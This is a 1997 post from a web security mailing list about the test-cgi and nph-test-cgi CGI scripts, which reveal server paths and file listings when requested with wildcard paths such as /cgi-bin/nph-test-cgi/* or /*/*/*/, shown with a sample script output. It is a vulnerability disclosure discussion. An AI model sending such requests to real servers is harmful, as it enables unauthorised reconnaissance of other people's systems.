[3940] in WWW Security List Archive
RE: test-cgi and nph-test-cgi
daemon@ATHENA.MIT.EDU (Luke Th. Bullock)
Wed Jan 8 18:36:36 1997
In-Reply-To: <199612110615.AAA10111@home.vicksburg.com>
Date: Wed, 08 Jan 1997 19:38:29 +0100 (GMT+0100)
From: "Luke Th. Bullock" <lucc@powertech.no>
To: dscan <bhazard@vicksburg.com>
Cc: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
On 11-Dec-96 The Guru dscan spake, and I quote:
>"/cgi-bin/test/cgi/*" can give an attacker valuable information about the
>server,like list the directory in the machine and list the files in the
>cgi-bin directory.In the other hand whenrun like this "/cgi-bin/nph-test-cgi/*"
>you`ll also see in the "PATH_TRANSLATED" line a list of the html files the
interesting yes.. take a look at the output of this one. You could get an entire
listing of the system, adding /*/*/*/ to the path, _if_ you bother to sit around
and wait for it. :)
----------- INSERTED FILE -----------------
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/1.2b4
SERVER_NAME = localhost
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
PATH_INFO = /cdrom/docs/catalog/ ## HERE I DELETED THE PATH ##
PATH_TRANSLATED = /var/lib/httpd/htdocs/*/*/*/ ## Notice this line ##
SCRIPT_NAME = /cgi-bin/nph-test-cgi
QUERY_STRING =
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
CONTENT_TYPE =
CONTENT_LENGTH =
~~~
. Luke Th. Bullock - aka Lucc .................................== ...
. lucc@powertech.no - Powertech Information Systems .......... || ...
. lbullock@tycho.com - Tycho SoftWorks (Marvin BBS) ......... / \ ..
. http://www.powertech.no/~lucc/ ........................... VSOP .
`=='
